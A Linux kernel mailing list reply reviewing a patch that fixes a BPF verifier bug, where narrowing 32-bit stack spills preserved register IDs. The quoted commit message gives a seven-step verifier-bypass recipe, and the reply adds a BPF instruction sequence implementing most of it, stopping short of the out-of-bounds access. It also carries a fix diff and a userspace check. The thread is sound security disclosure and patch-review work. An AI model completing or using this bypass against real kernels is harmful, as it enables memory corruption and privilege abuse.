Date: Tue, 6 Jun 2023 18:32:37 -0700
From: Yonghong Song <yhs@...a.com>
To: Maxim Mikityanskiy <maxtram95@...il.com>, bpf@...r.kernel.org
Cc: netdev@...r.kernel.org, linux-kselftest@...r.kernel.org,
        Daniel Borkmann <daniel@...earbox.net>,
        John Fastabend <john.fastabend@...il.com>,
        Alexei Starovoitov <ast@...nel.org>,
        Andrii Nakryiko <andrii@...nel.org>,
        Martin KaFai Lau <martin.lau@...ux.dev>,
        Eduard Zingerman
 <eddyz87@...il.com>,
        Maxim Mikityanskiy <maxim@...valent.com>, Song Liu <song@...nel.org>,
        Yonghong Song <yhs@...com>, KP Singh <kpsingh@...nel.org>,
        Stanislav Fomichev <sdf@...gle.com>, Hao Luo <haoluo@...gle.com>,
        Jiri Olsa <jolsa@...nel.org>, Mykola Lysenko <mykolal@...com>,
        Shuah Khan <shuah@...nel.org>, "David S. Miller" <davem@...emloft.net>,
        Jakub Kicinski <kuba@...nel.org>,
        Jesper Dangaard Brouer <hawk@...nel.org>
Subject: Re: [PATCH bpf v3 1/2] bpf: Fix verifier tracking scalars on spill



On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> From: Maxim Mikityanskiy <maxim@...valent.com>
> 
> The following scenario describes a verifier bypass in privileged mode
> (CAP_BPF or CAP_SYS_ADMIN):
> 
> 1. Prepare a 32-bit rogue number.
> 2. Put the rogue number into the upper half of a 64-bit register, and
>     roll a random (unknown to the verifier) bit in the lower half. The
>     rest of the bits should be zero (although variations are possible).
> 3. Assign an ID to the register by MOVing it to another arbitrary
>     register.
> 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
>     another register. Due to a bug in the verifier, the ID will be
>     preserved, although the new register will contain only the lower 32
>     bits, i.e. all zeros except one random bit.
> 
> At this point there are two registers with different values but the same
> ID, which means the integrity of the verifier state has been corrupted.
> The next steps show the actual bypass:
> 
> 5. Compare the new 32-bit register with 0. In the branch where it's
>     equal to 0, the verifier will believe that the original 64-bit
>     register is also 0, because it has the same ID, but its actual value
>     still contains the rogue number in the upper half.
>     Some optimizations of the verifier prevent the actual bypass, so
>     extra care is needed: the comparison must be between two registers,
>     and both branches must be reachable (this is why one random bit is
>     needed). Both branches are still suitable for the bypass.
> 6. Right shift the original register by 32 bits to pop the rogue number.
> 7. Use the rogue number as an offset with any pointer. The verifier will
>     believe that the offset is 0, while in reality it's the given number.
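
An illustrative (untested) encoding of the scenario above, using the
BPF_*_INSN macros from tools/include/linux/filter.h. The rogue constant
0x12345678, the register choices and the use of bpf_get_prandom_u32 as the
randomness source are arbitrary illustrative choices, not taken from this
series; the final out-of-bounds access (step 7) is only hinted at in a
comment:

	/* 1.-2. rogue number in the upper half, one random bit in the lower half */
	BPF_MOV64_IMM(BPF_REG_6, 0x12345678),
	BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_get_prandom_u32),
	BPF_ALU64_IMM(BPF_AND, BPF_REG_0, 1),
	BPF_ALU64_REG(BPF_OR, BPF_REG_6, BPF_REG_0),
	/* 3. reg-to-reg move makes the verifier assign the same id to r6 and r7 */
	BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
	/* 4. 32-bit spill + 32-bit fill; the buggy verifier keeps the id on r8 */
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_7, -8),
	BPF_LDX_MEM(BPF_W, BPF_REG_8, BPF_REG_10, -8),
	/* 5. compare against another register; the random bit keeps both branches reachable */
	BPF_MOV64_IMM(BPF_REG_9, 0),
	BPF_JMP_REG(BPF_JNE, BPF_REG_8, BPF_REG_9, 1),
	/* 6. in the r8 == 0 branch the verifier believes r6 == 0, while after the
	 *    shift it actually holds the rogue number;
	 * 7. (not shown) add r6 to any pointer and access it out of bounds
	 */
	BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 32),
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_EXIT_INSN(),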
> 
> The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> SCALAR_VALUE. If the spill narrows the actual register value, don't
> keep the ID; make sure it's reset to 0.
> 
> Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> Signed-off-by: Maxim Mikityanskiy <maxim@...valent.com>

LGTM with a small nit below.

Acked-by: Yonghong Song <yhs@...com>

> ---
>   kernel/bpf/verifier.c | 7 +++++++
>   1 file changed, 7 insertions(+)
> 
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 5871aa78d01a..7be23eced561 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   	mark_stack_slot_scratched(env, spi);
>   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
>   	    !register_is_null(reg) && env->bpf_capable) {
> +		bool reg_value_fits;
> +
>   		if (dst_reg != BPF_REG_FP) {
>   			/* The backtracking logic can only recognize explicit
>   			 * stack slot address like [fp - 8]. Other spill of
> @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   			if (err)
>   				return err;
>   		}
> +
> +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
>   		save_register_state(state, spi, reg, size);
> +		/* Break the relation on a narrowing spill. */
> +		if (!reg_value_fits)
> +			state->stack[spi].spilled_ptr.id = 0;

I think the code can be simplified like below:

--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
                                 return err;
                 }
                 save_register_state(state, spi, reg, size);
+               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
+                       state->stack[spi].spilled_ptr.id = 0;
         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
                    insn->imm != 0 && env->bpf_capable) {
                 struct bpf_reg_state fake_reg = {};

>   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>   		   insn->imm != 0 && env->bpf_capable) {
>   		struct bpf_reg_state fake_reg = {};
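
As a side note on the check itself: fls64(x) is the 1-based index of the
most significant set bit (fls64(0) == 0), so the id is dropped exactly when
the register's umax_value cannot be represented in the spilled slot. A
quick userspace sketch of the predicate, with a stand-in for the kernel's
fls64() and made-up sample values:

	#include <stdint.h>
	#include <stdio.h>

	#define BITS_PER_BYTE 8

	/* userspace stand-in for the kernel's fls64() */
	static int fls64(uint64_t x)
	{
		return x ? 64 - __builtin_clzll(x) : 0;
	}

	int main(void)
	{
		int size = 4;				/* 32-bit spill */
		uint64_t wide = 0x1234567800000001ULL;	/* rogue upper half + one low bit */
		uint64_t narrow = 0x7fffffffULL;	/* fits in 32 bits */

		/* fls64(wide) == 61 > 32: narrowing spill, the id must be dropped */
		printf("wide narrows:   %d\n", fls64(wide) > BITS_PER_BYTE * size);
		/* fls64(narrow) == 31 <= 32: the value fits, keeping the id is safe */
		printf("narrow narrows: %d\n", fls64(narrow) > BITS_PER_BYTE * size);
		return 0;
	}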
